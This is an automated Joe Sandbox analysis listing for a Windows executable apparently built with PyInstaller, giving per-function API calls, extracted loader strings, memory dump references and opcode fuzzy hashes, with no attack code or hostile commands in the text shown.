                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F870A
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F874C
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8830: GetEnvironmentVariableW.KERNEL32(00007FF62C0F388E), ref: 00007FF62C0F8867
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF62C0F8889
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C108238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C108251
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2810: MessageBoxW.USER32 ref: 00007FF62C0F28EA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                              • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                              • Instruction ID: 127c8c644071327446e162895d4b684c9f51dfee4e1841e75d0c787e07839a10
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB41D111A1D64248FE11E729AC5A2F91390AF897E0F944131ED0DC77DADF3DE546C30A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                              • Opcode ID: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                                              • Instruction ID: b5a338b783929cad4779f87220ea5676c707933e2c38f8c04746b14b5e70b0a5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4510322A0C64289EE21AB15EC413BA6291FF857B4F444131EE4EC77C5EF3DE981C706

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62C10F0AA,?,?,-00000018,00007FF62C10AD53,?,?,?,00007FF62C10AC4A,?,?,?,00007FF62C105F3E), ref: 00007FF62C10EE8C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62C10F0AA,?,?,-00000018,00007FF62C10AD53,?,?,?,00007FF62C10AC4A,?,?,?,00007FF62C105F3E), ref: 00007FF62C10EE98
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                              • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                              • Instruction ID: e29bd8be6c23f54e85a35f3a29795efa04a20659b168910b71ed527fba9d14ce
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C412222B29A5682EF15CB17AC096752391BF09BF0F884139DD5DC7794EF3CE4558306

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF62C0F3804), ref: 00007FF62C0F36E1
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F3804), ref: 00007FF62C0F36EB
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2C9E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2D63
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2C50: MessageBoxW.USER32 ref: 00007FF62C0F2D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                              • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction ID: 4e8cdb5d84c73ba29dae0b0be3486a0f330b31544a968323086ec233db2db0ea
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9921A761F1CA4285FE309724EC163BA2250BF98374F404132EE5DC25E5EF6DE645C74A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                              • Instruction ID: d5de01b296e57e1315b7a636ad8fd171338d95024b338c194b25237a98fabddb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20C1F322A0C68792EF609B15984A2BD7B50FB81BF4F554131EE4E83791EE7CE865C702

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                                              • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                              • Instruction ID: 27f1923d861f5aa6c08d6ba791f73f5243ecfc73ee9fb1d446c23abad981e651
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12215121A0C64246EF109B59B94526EA3A4EF867F0F600335EA6D83BE4DFBDD4858705

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetCurrentProcess.KERNEL32 ref: 00007FF62C0F8590
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: OpenProcessToken.ADVAPI32 ref: 00007FF62C0F85A3
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetTokenInformation.KERNELBASE ref: 00007FF62C0F85C8
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetLastError.KERNEL32 ref: 00007FF62C0F85D2
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetTokenInformation.KERNELBASE ref: 00007FF62C0F8612
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62C0F862E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: CloseHandle.KERNEL32 ref: 00007FF62C0F8646
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF62C0F3C55), ref: 00007FF62C0F916C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF62C0F3C55), ref: 00007FF62C0F9175
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(00000000,?,00007FF62C0F352C,?,00000000,00007FF62C0F3F1B), ref: 00007FF62C0F7F32
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C10CF4B), ref: 00007FF62C10D07C
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C10CF4B), ref: 00007FF62C10D107
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C105839), ref: 00007FF62C105957
                                                                                                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C105839), ref: 00007FF62C10596D
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1707611234-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,00007FF62C10A9D5,?,?,00000000,00007FF62C10AA8A), ref: 00007FF62C10ABC6
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62C10A9D5,?,?,00000000,00007FF62C10AA8A), ref: 00007FF62C10ABD0
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,00000000,00007FF62C10B32A,?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A), ref: 00007FF62C10EBED
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                                              • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                              • Instruction ID: eff9d3abf8d5232ad9977fcb4cb0c331c2c0cecbe3f15fb73027e239cd93ba5e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F09054B2928780FE59A76B9C5F3B402805F99BB0F4C8530CD4FC63C2EE5CE4A18212
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF62C100C90,?,?,?,00007FF62C1022FA,?,?,?,?,?,00007FF62C103AE9), ref: 00007FF62C10D63A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                                              • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                              • Instruction ID: a39ba22ef69299ae5797ac6fb7022814a1b6883c9326e92b67ad90b9cd67a3ad
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AF08C10F1824380FE653B715C5B2B412904FD4BB0F480730EC2EC62C2EE2EA4A28612
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                              • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                              • Instruction ID: 9b42112f5a6de7e26e6b0482f864bc7eddc8e5a0b83c699868f5fd35e10688a3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D02C664A0DB17D9FE15EB5DBC1A5B82375AF28774F540035D82E82660FFBCB1898207
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
